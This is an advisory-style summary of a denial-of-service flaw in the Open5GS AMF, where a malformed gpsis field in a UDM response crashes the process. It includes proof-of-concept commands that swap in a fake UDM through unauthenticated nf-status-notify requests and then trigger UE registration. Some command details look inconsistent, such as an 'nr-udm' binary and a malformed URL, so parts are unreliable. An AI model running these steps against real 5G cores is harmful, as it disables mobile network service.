Open5GS AMF DoS via Malformed gpsis in UDM Response

# Open5GS AMF Crash Vulnerability Summary ## Vulnerability Overview A vulnerability exists in the Access and Mobility Management Function (AMF) component of Open5GS that causes a service crash. When a User Equipment (UE) initiates a 5G registration procedure, if the `am-data` response returned by the Unified Data Management (UDM) contains a malformed `gpsis` parameter (e.g., `["msisdn"]` instead of the complete `["msisdn", "value"]`), the AMF will terminate the process due to an assertion failure. ## Impact Scope - **Affected Component**: Open5GS AMF - **Trigger Condition**: An external UE initiates registration, and the `gpsis` field in the `am-data` returned by the UDM lacks the second identifier token. - **Consequence**: The AMF process crashes (Core Dumped), resulting in service unavailability. ## Remediation According to the issue description, this vulnerability stems from the `ogs_id_get_value` function, which expects to retrieve two tokens separated by a hyphen (`-`) when processing strings. Maliciously crafted input causes the second token to be NULL, thereby triggering the assertion. **Recommended Fix Direction**: The AMF should handle malformed `gpsis` strings safely rather than crashing directly via assertion. ## POC / Exploit Code The page provides Docker commands and curl request code to reproduce the vulnerability, simulating a malicious UDM response: **1. Start the malicious UDM simulation container:** ```bash docker run -d --name amf-audit-gnb --network open5gs \ --network-alias gnb.uransim.org \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml ``` **2. Replace the real UDM in the AMF's local cache with the malicious UDM:** ```bash curl -H 'Content-Type: application/json' \ -X POST "http://AMF_IP:nrf-nfvr/nf-status-notify" \ -d '{"event": "NF_DEREGISTERED", "nfInstanceId": "http://nrf.open5gs.org/nrf-nfvr/nf-instances/4568f20e-30..."}' curl -H 'Content-Type: application/json' \ -X POST "http://AMF_IP:nrf-nfvr/nf-status-notify" \ -d '{"event": "NF_REGISTERED", "nfInstanceId": "http://10.33.33.1:10003/nrf-nfvr/nf-instances/fake-uds-amf"}' ``` **3. Start the malicious UDM node and trigger UE registration:** ```bash docker run -d --name amf-audit-udm --network open5gs \ --network-alias udm.uransim.org \ --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/udm.yaml:/ueransim/config/udm.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-udm -c /ueransim/config/udm.yaml -r # Subsequently, start the UE to perform the registration process, causing the AMF to crash ```

Goal Reached Thanks to every supporter — we hit 100%!

Open5GS AMF DoS via Malformed gpsis in UDM Response

More from this source